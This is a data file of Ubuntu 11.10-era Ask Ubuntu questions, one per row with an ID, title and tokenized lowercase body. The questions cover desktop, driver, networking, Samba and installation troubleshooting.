87910	how do i stop compiz from crashing when i change some configuration ?	my story is this : i have a laptop toshiba satellite a665-sp6004 , intel core i7 inside , nvidia geforce gt 330m graphics . i recently switch to ubuntu 11.10 and i have experienced some problems , one of them is compiz : suddenly , compiz is turned off and since unity is a compiz plugin , this makes it drop out of the interface . this also happens every time i make a modification of anything , for example configure the awn , which is very annoying . another problem i had is : to turn off the pc is locked . after clicking on shut down , the top panel turns purple and the rest of the black screen freezes , then i have to force it off , which is very risky . the keypad light . works perfectly in windows but still does not work in ubuntu ... if someone can tell me how to solve at least the problem i have with compiz that will be very helpful . thank you .
87911	ubuntu books for 11.10 ?	i 'm looking for some good books to check out that are updated to cover the current version 11.10 . while this question may be close to these two topics : are there any good books for new ubuntu user ? list of free ubuntu books those two are both more than a year old so the books suggested are a couple of versions behind . i have been using ubuntu for a couple of years now so i would like to stray away from the for beginners books and get more into the nitty gritty aspects of what makes the system run , etc . both free and paid book suggestions would be awesome !
87912	how to go to login screen with terminal	i want to make a simple script to go to the login screen and sleep the display on 11.10 , as i find the login screen much prettier than the 'lock screen ' prompt . however , i can not find a single reference to switching to the login screen ( without logging out ) from a terminal or shell script . i would also appreciate suggestions for sleeping the display after switching to the login screen , or as one whole script if possible . thanks edit : this is with unity 3d ( as far as i know ) , i do n't really know what the difference between that and gnome is .
87914	blackberry and ubuntu . as easy to connect ?	how to connect ubuntu to blackberry ? i 'm tired , have no kits for handling or pls-friendly software for managing smartphone . above all blackberry . what software should i use to use as transmission modem ?
87916	muon package manager thinks that other package manager is open , and is not	i use kde in ubuntu 11.10 ( i installed kde with kubuntu-desktop using software center ) , which comes with muon package manager bundled , but some day muon package manager decided not to update and giving an excuse 'that other package manager is already running ' . another application seems to be using the package system at this time . you must close all other package managers before you will be able to install or remove any packages i open krunner , nothing that is related with package managment is running as i can see in the processes running . i did everthing what is posted here : http : //kubuntuforums.net/forums/index.php ? action=printpage ; topic=3119344.0 and muon-updater/muon package manager refuses to install any updates . i can install/uninstall with aptitude , apt-get with no error notifications , i can even upgrade packages with gnome 's update manager , but that 's not my case . i do n't have broken packages , as 'aptitude ' does n't tell me nothing about broken packages , neither muon , neither apt-get . what else can i do in order to get muon installing/upgrading packages as usual ? . as additional info : i upgraded kde 4.7.2 to 4.7.3 through kubuntu-updates ppa , and i have 202 packages to upgrade but aptitude says that wo n't upgrade many packages because the upgrading will broke dependencies , that in every upgradeable package listed in aptitude . i made in konsole sudo apt-get update & & sudo apt-get upgrade then it list the 204 packages that will upgrade but in the end says 204 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . need to get 161 mb of files . it used 233 kb of additional disk space after this operation . do you want to continue [ y / n ] ? i translated the apt-get message using google , this is the original in my native language : 204 actualizados , 0 se instalarán , 0 para eliminar y 0 no actualizados . necesito descargar 161 mb de archivos . se utilizarán 233 kb de espacio de disco adicional después de esta operación . ¿desea continuar [ s/n ] ? this last might be the reason why muon ca n't upgrade anything ? .
87918	any app or command to view list of installed codecs	i just wanted to know whether is it possible to view a list of codecs installed on my ubuntu 11.10 through any command , script or app ? if you know any app even if it 's in `` rpm '' format ( i will use alien to convert it to `` deb '' ) please feel free to suggest , thanks . regards , arsalan alam
87919	unwanted subdomain requests in the dns query logs ( bind9 )	i am running my own dns and i am logging all the dns lookups . today , i realized that there are over 200 entries for unwanted subdomain queries in the log . interestingly , these non-existent subdomains are possibly sensitive areas . another issue is that these entries do not exist in either access.log or error.log . i am kinda worried that these are hack attempts . i have 3 questions : how can i add these non-existent subdomain queries to error.log ? is there any ubuntu package out there that can block this kind of hack attempt ? what are my other options ? sample dns query log : 15-dec-2011 01:12:41.726 queries : info : client 169.152.96.22 # 42014 : query : adminarea.site.com in a -ed ( 174.227.21.23 )
87924	how to configure internet/network connection	i am unable to connect to the internet . i attached a lan wire but i really cant understand the issue behind it . i need appropriate network drivers for acer aspire 5742 . please help
87925	shortcut for iotop in the unity taskbar ?	how can i make a shortcut in the unity taskbar ( the one on the left side of the screen ) that starts iotop in the terminal ?
87935	graphical ssh private key prompt not showing up	i recently stopped using a full desktop environment in ubuntu 11.10 ( tired of unity ) but i 'm trying to get some of the desktop environment back . i 'm currently trying to get the `` unlock private key '' dialog to show up when i 'm trying to use a new ssh key . however , currently the prompt only shows up in the terminal window instead of the gui , which means that it is n't using a global ssh-agent and hence i need to enter the key password multiple times before i restart . i think what i want is gnome-ssh-askpass and i tried setting ssh_askpass but that did n't work : http : //www.linuxquestions.org/questions/linux-software-2/how-to-replace-ssh-askpass-with-ssh-askpass-gnome-843220/ i 've also tried gnome-keyring-daemon as gnome-keyring-daemon -- components keyring , pkcs11 , ssh but that did n't help : http : //live.gnome.org/gnomekeyring/ssh
87939	how do i hide an 'unshared ' directory ?	i 'm sharing a directory with another user . this directory is called /home/shared . when i was setting up the home network ( that 's another question ) , i found the 'shared ' directory with read access in the `` browse network '' part of nautilus . i 'm not aware of having shared this directory on the network , it does n't show up in /etc/fstab , nor in /mnt on the server . how can i remove this directory ? as a side note , i 'm not seeing my own home directory in the share .
87940	cache memory and fglrx driver slows computer	when ever my cache memory gets extremely high , my entire computer slows down . windows slow to load , and there 's lagging on the mouse-overs for everything . the only way i can restore everything is by rebooting . this happens particularly whenever i view a youtube or any video in fullscreen . the cache memory goes up , and the computer slows . it has just happened again after making a virtual box vdi file . after creating a blank vdi file , the computer is really slow . i do n't think virtual machine usage has anything to do with it , since it happens even when i have n't loaded any virtual machines . it happens mostly when i watch a video in full screen . next time it happens , i 'll try to see what more information i can find in the system monitor . i use the fglrx driver for my ati radeon 5000 series graphics card , but i 'm unsure if this is a driver issue . this occurred in ubuntu 10.04 , so i installed ubuntu 11.10 ( removing 10.04 ) thinking it would solve the problem , but it has n't .
87944	problem with saving metadata of audio files with id3tool	i have a music file mp3 for which i tried to change its meta data ( album ) using id3tool . however when i see in banshee or rhythm box its still showing the old name only ( after rescanning library also ) . any idea why id3tool is not working ? using id3tool i changed the below songs album name to new one . in id3tool its showing as new one only filename : aarya 2 -_mr.perfect ~ trojan.mp3 song title : mr.perfect artist : baba sehgal , rita album : aarya 2 note : track : 1 year : genre : other ( 0xc ) but in banshee or other players , its saying album name as different ( old one ) only
87950	auto mount windows partition in rhythmbox player	i want that whenever i open rhythmbox player it will auto mount the windows partition where all my music files are placed . is there anyway i can invoke the mounting of windows partition in the .desktop file please note that i do n't want to automount windows partition on every login . i just want the windows parition to be mounted automatically whenever i open rhythmbox player . thanks in advance .
87954	how to delete webapp created using epiphany ?	how can i delete a webapp that i have created using the epiphany browser ?
87956	can you set passwords in .ssh/config to allow automatic login ?	i 'm using ubuntu 11.10 . i 'm using ssh for connecting to many servers daily , so i put their parameters in .ssh/config file ; like this : host home user netmoon port 22 hostname test.com is there a way to put passwords in this file , for each connection ? so when server asks for password , terminal put its pass and send it to server . it 's because sometimes i stand away from the pc and when i go back and type password , and press enter , terminal said connection closed . i do n't want to use public/private key pair .
87960	synapse does not show folders	i recently installed synapse to compare it to gnome-do . but except for the home folder , synapse does not show any folder on my system - even if i type the exact name of that folder . gnome-do shows all folders i need . is this a bug or is this intended ? on the other hand , i have the synapse `` directory search '' -plug-in running . cheers
87962	how can i use a tp link usb wireless adapter without having to reinstall the driver every time ?	i 'm new to ubuntu 11.10 . i 've followed some guides on how to install usb wifi drivers . everything is fine but here 's my problem : everytime i boot up my system my wifi adapter is not working . in order for it to work i have to remove my usb wireless adapter > then remove the installed driver > then reinstall the driver before plugging the usb wireless adapter in order to work . because if i install the driver while the device is plugged nothing will happen . i want ubuntu to detect may usb wireless adapter every time i boot/reboot my pc . doing the procedure ( mentioned above ) every time i boot/reboot my pc is a chore . please help ... i 'm using a desktop pc and using a tp-link usb wireless adapter via ar5523 driver . ok here 's an update : it 's really weird but by accident i forgot to remove my usb while doing the re-installation of the driver . the driver detected my usb wifi adapter and all of a sudden my adapter 's light indicator starts flashing ( unlike before my adapter will not function ) .
87964	hdd in idle system stays active	when having ubuntu 11.10 idle , hard-disk is still doing `` something '' periodically for a very small time ( i have 8gb ram ) . i can hear the seeks every few seconds ( iostat tells something like 20kb/s ) . what process could cause that ? i thought that 's a windows issue only .
87967	does anyone know how to create pretty + cool conky ?	does anyone know how to make pretty cool conky step by step ?
87970	multitouch support for magic mouse on further releases ?	in older questions on internet i found that the magic-mouse multitouch-support should work since 11.04 . now we have 11.10 and i did n't find any news , that here is a multitouch-support planned for 12.04 . also the official touch-homepage does n't says anything about a planned support for this device . https : //wiki.ubuntu.com/multitouch/hardwaresupport does anyone knows more ? is there hope for multitouch-support of magic-mouse in further releases ? ? does anyone knows concrete plans ? i own this mouse and it supports only : - one finger - vertical/horizontal scroll - right , left and middle - click this mouse is very useful and it could be much more if it would be supported like the apple magic trackpad .
87979	configure mdadm for existing intel rapid storage array	i have a raid 1 configured by intel rapid storage from the bios . with windows i have an application which manage the raid . i read about intel rapid storage for linux and found that the option is to install mdadm . now i 'm trying to apply the configuration in ubuntu but i have n't found how to do it . i do n't want to break the raid or recreate it . someone knows how to do it ?
87980	start the unity panel through the command line ?	in previous versions of ubuntu i could start the panel by typing gnome-panel into a terminal . this would cause the top and bottom panels to appear , helpful , for example , if i was in a different desktop environment at the moment ( e.g. , openbox ) and wanted to open the panel . is there an equivalent command to start the unity panel from the command line ? any help would be greatly appreciated .
87982	how can i get back the sound-menu integration for music players in gnome classic ?	i have just upgraded to oneiric ( 11.10 ) from natty . in unity-2d sessions , the sound-menu integration lets me control banshee ( and maybe clementine too ) . in gnome classic sessions however , it 's gone . is there a way to get it back ?
87984	ca n't install xubuntu with unetbootin from hardrive	i have no dvd or usb and i 'm trying to install xubuntu with unetbootin from hardrive . i have 120gb hardrive with 3 partition : win7 , swap , and one for xubuntu first i do this and get the following error : i have tried with with ex2 , ex4 , ex3 but get the same error .
87991	i installed latest kernel version on kubuntu but it does n't appear on grub list	i installed the latest kernel version ( 3.0.0-15 ) through the muon package manager of kubuntu 11.10 but when i reboot the system it does n't appear on grub list so i can use only the 3.0.0-12 kernel version . synaptic reports that it 's installed the kernel 3.0.0-14 version too but it does n't appear too . the 3.0.0-14 and 3.0.0-15 versions did n't have the kernel image installed so i tried to install them but they do n't appear on grub list in any case . any idea ? many thanks in advance !
87994	is there a way to automate a dist-upgrade at boot time ?	i run a bleeding-edge vm as bug reporting is about the only 'give back ' activity that i have time to do . i am however getting sick of things ( understandably ) crashing , only to be told 'nope , we already fixed that yesterday , your packages are all old ' . has anyone come across an invisible way to update & & upgrade on boot ? ( i.e not login )
87996	problem installing ubuntu on ux21	when trying install ubuntu on zenbook ux21 i always get same problem - after choosing installing ubuntu , screen become black and installation doesnt progress . any hint ?
88001	how do i change what files ubuntu one syncs vs ignores ?	i noticed yesterday that ubuntu one is not syncing some of my bip logs , but is syncing others . it appears that ubuntu one is ignoring certain files because they start with a # sign . how can i modify what files ubuntu one sync vs ignores ?
88006	automatic installation error	i have a ubuntu orchestra server setup and i 'm trying to install some desktop ubuntus across the network . the version i am trying to install is 11.10 . my preseed file is like this : # preseeding only locale sets language , country and locale . d-i debian-installer/locale string en_us # enable extras.ubuntu.com . d-i apt-setup/extras boolean true # install the ubuntu desktop . tasksel tasksel/first multiselect none # keyboard selection . # disable automatic ( interactive ) keymap detection . d-i console-setup/ask_detect boolean false d-i keyboard-configuration/layoutcode string br # controls whether or not the hardware clock is set to utc . d-i clock-setup/utc boolean true # you may set this to any valid setting for $ tz ; see the contents of # /usr/share/zoneinfo/ for valid values . d-i time/zone string america/sao_paulo # # # account setup d-i passwd/root-login boolean false d-i passwd/make-user boolean true d-i passwd/user-fullname string ubuntu user d-i passwd/username string ubuntu # normal user 's password , either in clear text d-i passwd/user-password-crypted password $ 1 $ zgnbzcxq $ hur0cnhvtyavnnnna2.br1 # # # partitioning d-i partman-auto/disk string /dev/sda d-i partman-auto/method string regular d-i partman-auto/purge_lvm_from_device boolean true d-i partman-lvm/device_remove_lvm boolean true d-i partman-md/device_remove_md boolean true d-i partman-lvm/confirm boolean true d-i partman-auto/choose_recipe select atomic d-i partman-auto/expert_recipe string \ boot-root : : \ 40 50 100 ext4 \ $ primary { } $ bootable { } \ method { format } format { } \ use_filesystem { } filesystem { ext4 } \ mountpoint { /boot } \ . \ 1000 1500 2000 ext4 \ method { format } format { } \ use_filesystem { } filesystem { ext4 } \ mountpoint { / } \ . \ 1000 1500 100000000 ext4 \ method { format } format { } \ use_filesystem { } filesystem { ext4 } \ mountpoint { /home } \ . \ 64 512 300 % linux-swap \ method { swap } format { } \ . d-i partman-partitioning/confirm_write_new_label boolean true d-i partman/choose_partition select finish d-i partman/confirm boolean true d-i partman/confirm_nooverwrite boolean true # # # apt setup # you can choose to install non-free and contrib software . d-i apt-setup/non-free boolean true d-i apt-setup/contrib boolean true d-i apt-setup/services-select multiselect security d-i apt-setup/security_host string security.ubuntu.com d-i apt-setup/security_path string /ubuntu # # # mirror settings d-i mirror/country string manual d-i mirror/http/hostname string ubuntu.mirror.pop-sc.rnp.br d-i mirror/http/directory string /ubuntu d-i mirror/http/proxy string # # # package selection # tasksel tasksel/first multiselect ubuntu-desktop # individual additional packages to install # d-i pkgsel/include string openssh-server popularity-contest popularity-contest/participate boolean false d-i grub-installer/only_debian boolean true # # # finishing up the installation d-i finish-install/reboot_in_progress note and i get an error on the installing packages phase . a menu shows up where i have the option to select install packages again , but even if i do i get the same error . what is wrong in this configuration file ? in the tasksel part , besides none , i also tried ubuntu-desktop , but i get the same error . appreciate any help kelly [ edit ] i made a change commenting out the partioning section and it worked ! but i really need to specify the partitioning schema ... : (
88010	assigning shortcuts ( accelerators ) to nautilus 3	i want to assign some shortcuts to menu actions in nautilus 3.2.1 running under ubuntu 11.10 . i followed the steps shown here how do you create a `` new document '' keyboard shortcut ? but it did not work for me . switched to gnome classic so i can get the normal menu , hovered over the desired action pressed the desired keys but nothing happened ( restarted nautilus , re-logged and nothing ) . any suggestions or ideas on how to assign custom shortcuts to actions in nautilus 3
88015	acrobat reader and foxit 's scrollbar not working	i 've installed acro reader to view pdf files , but the vertical scrollbar is n't working . when i scroll it , it has no effect over the pdf file . however , i can navigate the files using the arrow keys or pgup/pgdn . so i installed foxit reader to overcome this issue , and to my surprise , the same problem happened . i ca n't scroll down the files using the scrollbar . the strangest thing is that this issue only occurs in acroreader and foxit . every other application works perfectly . does anyone have an idea to fix this ?
88016	why is the jdee package in multiverse ?	why is the java development environment for emacs package in the multiverse repository ? the software is available under the gpl .
88018	proposal to update from 11.04 to 11.10 is not shown	i 'm trying to update my ubuntu from 11.04 version . but when i open update center there is no mention about upgrade to 11.10 . how can i upgrade ?
88019	chromium not opening urls	i have installed the nightly build of chromium using this script i created . i have set it as default web browser , although opening urls via gnome-open and xdg-open just opens a new tab . using the executable file works as expected . what could the problem be ? update-alternatives -- query gnome-www-browser output : link : gnome-www-browser status : auto best : /opt/chromium-nightly/chrome value : /opt/chromium-nightly/chrome alternative : /opt/chromium-nightly/chrome priority : 1200 alternative : /usr/bin/firefox priority : 40 update-alternatives -- query x-www-browser output : link : x-www-browser status : auto best : /opt/chromium-nightly/chrome value : /opt/chromium-nightly/chrome alternative : /opt/chromium-nightly/chrome priority : 1200 alternative : /usr/bin/firefox priority : 40 xdg-settings get default-web-browser output : chromium-nightly.desktop cat /usr/share/applications/chromium-nightly.desktop output : [ desktop entry ] type=application encoding=utf-8 name=chromium nightly comment=browse the web exec=/opt/chromium-nightly/chrome icon=/opt/chromium-nightly/product_logo_48.png
88026	gconf-editor like tool for kde	i use some kde apps ( eg : konsole . ) on a gnome-shell session , and i ca n't always get to the settings menu ( due to global-menu malfunctions ) . so , i wanted another way of editing kde app settings without editing the configuration files stored in .kde directly . is there a convenient application like gconf-editor ( which works with gnome apps ) ?
88028	wacom bamboo capture cth-470 pen and touch not working	i am trying to get my new bamboo pen & touch tablet to work on ubuntu . i tried following the guide on this page ; i installed and updated the wacom-dkms package , and nothing . i followed the guide on this page ; i upgraded the xf86-input-wacom package , and ran all the commands in appendix 1 : still nothing . i know that ubuntu recognizes it , because when i run `` lsusb '' it shows up as '' bus 005 device 003 : id 056a:00de wacom co. , ltd `` anyone know what i am doing wrong ? if i ca n't get it to work , it 's not a huge deal , because it works just fine on windows . it would make things a lot easier if i do n't have to keep os-hopping , though -- especially with windows ' long boot times ... : - }
88029	using ubuntu as a router ?	i 've seen many tools to use ubuntu as a router in which an internet connection could be shared from ethernet over wifi or vice versa . i 'm looking to achieve this except with 2 ethernet connections : internet -- > computer 1 ( with 2 ethernet cards ) -- > computer 2 how can i configure computer 1 to be able to share the connection in the above method . i 'm confident in using the terminal or editing config files , but i would much prefer some sort of automated gui based program such as the settings available in os x. i can not just use a router , i do n't have a spare router to use for this temporary set up that i need . i can use any kde , gnome or xfce based tool .
88030	banshee stopped working properly	so ... i was having some trouble with banshee and i decided to uninstall it . i tried to install it again but now when i click to open , banshee does n't open . i thought that the problem could be broken packages , or missing plugins , but it seems the problem is n't this . does anybody know what to do ? = /
88031	how to resize the top panel in unity ?	i want to resize ( increase size ) the ubuntu 11.10 top taskbar , no the unity launcher , i 've searched it on google , but i 'm not encountered any solution . i need it only for customize my ubuntu 11.10 installation , for make it more aestetic .
88036	create multiple pdfs from links	there is a software or a script that given some links will return pdf version of it ?
88041	how to get samba ( computer 1 ) to show up on windows 7 ( computer 2 ) if both are in the same lan ?	sorry for the newb factor but i have two computers ( one linux , one windows ) . i followed this directions on this website . and have been able to make it past the last step without any problems : ~ $ smbclient -l 192.168.1.3 however my sambashare is n't showing in my network on windows 7 ? any advice on how i can get it to show up on my pc ? i believe i have properly configured everything in the network admin panel ( url:192.168.1.1 ) by setting my linux machine as a static ip , etc ...
88044	should n't there be a specific wayland ati driver ?	i use a 1gb ati hd radeon graphic card on a dell laptop i 'm still a newbee at this ; but from my understanding , the latest ubuntu does not use x.org anymore , but uses wayland . and the fglrx ( both the one provided by canonical , and the one you can download from the amd site itslef ) are used for x.org . i 've managed to get both of them working in the latest ubuntu ( since the gl billards game seems to work fine ) . but should n't there specifically be a wayland ati driver ?
88047	recursive html to pdf	i have a folder with this structure : /main-folder /index.html /subfolder1 /index1.html /file1.html with many sub folder and only html files ... i want to convert all them to pdf using only one command or a simple script that does n't require all file names . do you know one
88051	how can i stop gnome shell 's drive pop up notifications ?	i have an nfs drive mapped in ubuntu 11.10 using autofs which automatically mounts a drive on every boot . but if i use the gnome shell interface , a pop up notification keeps popping up from the bottom-centre of the screen saying the name of the mapped drive and an eject option . it pops up about every 5 minutes even though the nfs drive is already always mounted . any way to stop this ?
88052	how can i make a theme and test it easily for ubuntu ( unity ) ?	i 'll never say that the ubuntu ambiance theme is n't a beautifu theme , but i want to make a new one , i want to try to make a theme for my unity as well . i searched a lot yesterday but i did n't see nothing useful . where i have to look to make a theme in gtk3+ and the new theme engine unico ? i need documentation about these and also something about unity . ah , i have another question , now i trying to make a theme changing small parts of text , but i do n't know how to restart unity , gnome panel , and gtk , so i must log out and log in everytime i make a change , are there easily method to test a theme ? ( do n't tell me change the theme because i tryied it but it do n't change everything and some color and button remain the same ) sorry for my bad english , thanks in advance !
88057	reset gimp user interface only	i have messed with gimp ui and i can not find some buttons/tabs . i s there a way to reset everything to default without loosing other data ? sorry if it is answered somewhere , search button did n't help ! thanks !
88061	how to charge an ipad ?	trying to charge my ipad with my ubuntu 11.10 laptop ( hp probook 5320m ) . it connects and i am able to download photos for instance . however battery does n't charge at all . does anyone know how to fix this ? output of lspci | grep usb 00:1a.0 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 4 ( rev 02 ) 00:1a.1 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 5 ( rev 02 ) 00:1a.7 usb controller : intel corporation 82801h ( ich8 family ) usb2 ehci controller # 2 ( rev 02 ) 00:1d.0 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 1 ( rev 02 ) 00:1d.1 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 2 ( rev 02 ) 00:1d.2 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 3 ( rev 02 ) 00:1d.7 usb controller : intel corporation 82801h ( ich8 family ) usb2 ehci controller # 1 ( rev 02 )
88063	how to invert fn keys on dell laptop ?	my dell laptop ( xps 15z ) has special keys on the f1-f12 keys . if i want to disable keyboard backlight for example , i must type fn + f6 . is it possible to invert it ? in fact , i do n't often use the f* keys . how can i only hit f6 to disable the backlight and fn+f6 to type f6 ? is it possible ? thanks .
88067	can i remove ( or hide ) the unity launcher ?	i want to remove the launcher from the left side of the screen completely ( or at least hide it ) and not pop up when i hover with the mouse .
88079	what command can mount an ssh share and launch a file ?	i have a file on another ubuntu machine . i want to access it from my machine on my lan . i do n't want to go into nautilus to mount the share first and then browse to the file . i want a command that will connect via ssh automatically ( by mounting its share if not already or however ) and open that file on my machine in the associated program ( assume i do have that program install on my machine ) . any simple way to do this ? i will be putting this command into a launcher so i can just double-click it .
88080	how to change permissions to the other drives in a hard disk ?	i have dual booted with xp and ubuntu 11.04 . later i formatted ubuntu partition with 11.10 now i have three drives one for xp other for ubuntu and other for data when i log in into ubuntu i am unable to create or delete the all files in the other two drives ( xp drive and data drive ) . is there any way to change permissions to the entire drive ? i am unable to change permission by gui ( properties option ) .
88082	skype ( and general ) full-screen problems	i am running ubuntu 11.10 with all updates installed as of now . i am using unity . skype is running more or less ok with one exception . when i have a video call and i try to full-screen the call , the other person 's video just hangs . when i go back to windowed mode , the video continues normally . this only happens when i have another application running in full-screen . when firefox is running ( regardless of whether it is in full-screen or not ) , skype full-screen is not possible at all . another thing that is possibly related is the playback of video with the default video player . full-screen just makes the player hang totally . windowed mode works until a certain window size is reached - after that the player dies . flash video playback is fine , however . ( edit : just experimented and mplayer behaves in the same way with full-screen video ) i figure that this is a compiz/unity problem , or something related to the way my video driver plays with unity/compiz . any ideas appreciated .
88088	blank screen during boot after clean ubuntu 11.10 install ( intel n10 graphics )	after a clean install of ubuntu 11.10 on my asus eee pc 1005p , ubuntu seems to boot correctly , except for initialization of the lcd screen . what i observe : i choose ubuntu 11.10 in the grub 2 menu a blank screen with a blinking cursor in the top left of the screen , for 15-20 seconds . the ubuntu logo with 5 red dots in the center of the screen , for 1 second . the lcd screen is entirely blank the startup sound plays ( ubuntu is configured to auto-login ) still , the lcd screen is entirely blank . when i press fn-f8 ( the switch between lcd screen and external vga ) , the lcd screen shows my desktop correctly and everything seems to work fine . except for the adjust contrast buttons ( fn-f5 and fn-f6 ) , these seem to cycle through random brightness modes . something like : 0 % - 50 % - 20 % - 0 % - 20 % - 0 % any ideas what 's causing this or how to solve this ? coen @ elpicu : ~ $ lspci -v 00:02.0 vga compatible controller : intel corporation n10 family integrated graphics controller ( prog-if 00 [ vga controller ] ) subsystem : asustek computer inc. device 83ac flags : bus master , fast devsel , latency 0 , irq 44 memory at f7e00000 ( 32-bit , non-prefetchable ) [ size=512k ] i/o ports at dc00 [ size=8 ] memory at d0000000 ( 32-bit , prefetchable ) [ size=256m ] memory at f7d00000 ( 32-bit , non-prefetchable ) [ size=1m ] expansion rom at < unassigned > [ disabled ] capabilities : < access denied > kernel driver in use : i915 kernel modules : i915 00:02.1 display controller : intel corporation n10 family integrated graphics controller subsystem : asustek computer inc. device 83ac flags : bus master , fast devsel , latency 0 memory at f7e80000 ( 32-bit , non-prefetchable ) [ size=512k ] capabilities : < access denied >
88089	hdmi signal interrputs after 10 minutes plugged in a tv	ubuntu 11.10 , dell inspiron n4050 , vlc , jupiter i 'm trying to watch movies through hdmi output on a tv , with vlc , with the notebook unplugged from ac ( but with enough battery for 2-3 hours of use ) , just with tv display ( the notebook display stays off ) and from 10 to 10 minutes , the tv turns black , and according to the tv , the hdmi cable is unplugged . but using the touchpad makes the screen appear again . in `` screen '' options , on system settings , i 've set the screen to never turn off , and never reduce brightness using battery . in `` power '' settings , i 've set to not suspend when using battery . in jupiter , i 've set ( while trying to watch the movie ) to work in maximum performance . i 'm pretty sure it 's not vlc , because i 've set it to override power options and screensaver options ( and also im not using xscreensaver ) . also the movie continues , when the screen is black maybe there 's something that i 'm missing ? when i plug the hdmi in the notebook , i use jupiter to change the display ( using the option `` external display only '' ) ... maybe is that ?
88091	how to run a shell script in background ?	how can i run a shell script in background ?
88097	managing the login screen 's sessions list	on oneiric , i just installed a bunch of desktop environments / shells / windows managers by installing the kubuntu-desktop , xubuntu-desktop , lubuntu-desktop , e17 and gnome-desktop packages . sometimes i enjoy a little variety , so i prefer to login to a random one each time i boot up . however , now the list of sessions i can choose from has close to 20 choices . i only want maybe five or six options , so most of them i will never use , e.g . unity2d , or xfce ( i 'd just use for the xubuntu session ) . so i was wondering if there is a way to edit this list to only show the session i actually care about .
88099	ca n't see my system-drive - where is it ?	i just installed ubuntu 11.10 on my imac . i created a partition with bootcamp and instead of installing windows i installed ubuntu . when installing ubuntu i selected to install it additionally to mac os , not to overwrite . it seems to have been working , but i ca n't find my ubuntu drive now ? i see mac os x - drive with all mac os data on it , i see `` bootcamp '' -drive , but its empty ? this is what sudo fdisk -l gives out , may be helpful for you . warning : gpt ( guid partition table ) detected on '/dev/sda ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sda : 2000.4 gb , 2000398934016 bytes 255 köpfe , 63 sektoren/spur , 243201 zylinder , zusammen 3907029168 sektoren einheiten = sektoren von 1 × 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x558a880e gerät boot . anfang ende blöcke id system /dev/sda1 1 39 19+ ee gpt /dev/sda2 40 409639 204800 b w95 fat32 /dev/sda3 * 409640 1951581479 975585920 af hfs / hfs+ /dev/sda4 1951581480 1952851015 634768 af hfs / hfs+ platte /dev/mapper/cryptswap1 : 8579 mbyte , 8579576320 byte 255 köpfe , 63 sektoren/spur , 1043 zylinder , zusammen 16756985 sektoren einheiten = sektoren von 1 × 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x4d306ae6
88102	share wifi connection with android device	i have a laptop with ubuntu 11.10 connected via wifi to internet . i would use the laptop as access point and let other devices like my android phone or another laptop to connect to internet through ubuntu . is there a step by step guide to make it possible ? thanks in advance .
88103	wireless led does n't stop blinking on an hp dv5 with an atheros ar5007	so , i 'm having this problem with the wifi led which does n't stop blinking when i 'm using the internet . i have tried many different solutions . i have searched a lot in other topics on google , ubuntus forums , and blogs and none of the solutions they presented worked for me . i hope that one of you guys can help me here . my notebook is an hp dv5 1240br , and the wireless adapter is an atheros ar5007 802.11b/g . thigomes95 @ homenotebook : ~ $ lsmod | grep ath ath5k 156371 0 ath 24067 1 ath5k mac80211 462092 1 ath5k cfg80211 199587 3 ath5k , ath , mac80211
88106	how to solve my partition table ?	i have an issue , not necessarily a problem . i have a disk , which had ubuntu 11.04 , a swap , a big ntfs and some free space . when 11.10 came out , i did a fresh install and recently i 've deleted the 11.04 partition since i did n't needed it anymore . i 've noticed that my partition table is a little bit messy . especially that i seem to have 2 primary empty partitions at the beginning and end of the partition table and my swap /dev/sdb5 seems to reside in an extended container /dev/sdb2 ( probably old swap from 11.04 ) . here is a screenshot from gparted : any way i could make some order in here ?
88108	samba share read only for guests , read write for authenticated users	is it possible to have a samba share read only for guests , and read write for authenticated users ? if i put guest ok on an share then i am not prompted for a password , and effectively logged as guest with read only rights . but i want to be authenticated so that i can also write . could anyone provide a sample smb share stanza to achieve this ?
88110	centrino n-1000 wireless conected with internet access until i start browsing	i am new to ubuntu and have been researching this for awhile now . still cant seem to come up with any thing . i am in the communications field , so i have a general idea of how things work . i am in germany and i put the wpa2/personal security code in and it connects ... . click on firefox start browsing and it disconnects starts to reconnect and asks me for the wpa code again . and sometimes dosent even reconnect . i dont have any problems with wired connections . shannon @ shannon-dell-system-xps-l502x : ~ $ lshw -c network warning : you should run this program as super-user . -network description : wireless interface product : centrino wireless-n 1000 vendor : intel corporation physical id : 0 bus info : pci @ 0000:03:00.0 logical name : wlan0 version : 00 serial : 8c : a9:82:68:7c:7c width : 64 bits clock : 33mhz capabilities : bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlagn driverversion=3.0.0-12-generic firmware=39.31.5.1 build 35138 latency=0 multicast=yes wireless=ieee 802.11bgn resources : irq:51 memory : f1b00000-f1b01fff *-network description : ethernet interface product : rtl8111/8168b pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:06:00.0 logical name : eth0 version : 06 serial : 14 : fe : b5 : aa : af:6e size : 100mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=rtl_nic/rtl8168e-2.fw ip=192.168.2.102 latency=0 multicast=yes port=mii speed=100mbit/s resources : irq:41 ioport:2000 ( size=256 ) memory : f1804000-f1804fff memory : f1800000-f1803fff warning : output may be incomplete or inaccurate , you should run this program as super-user . shannon @ shannon-dell-system-xps-l502x : ~ $ sudo rfkill list 0 : dell-wifi : wireless lan soft blocked : no hard blocked : no 1 : phy0 : wireless lan soft blocked : no hard blocked : no any help would be greatly appreciated ! ! !
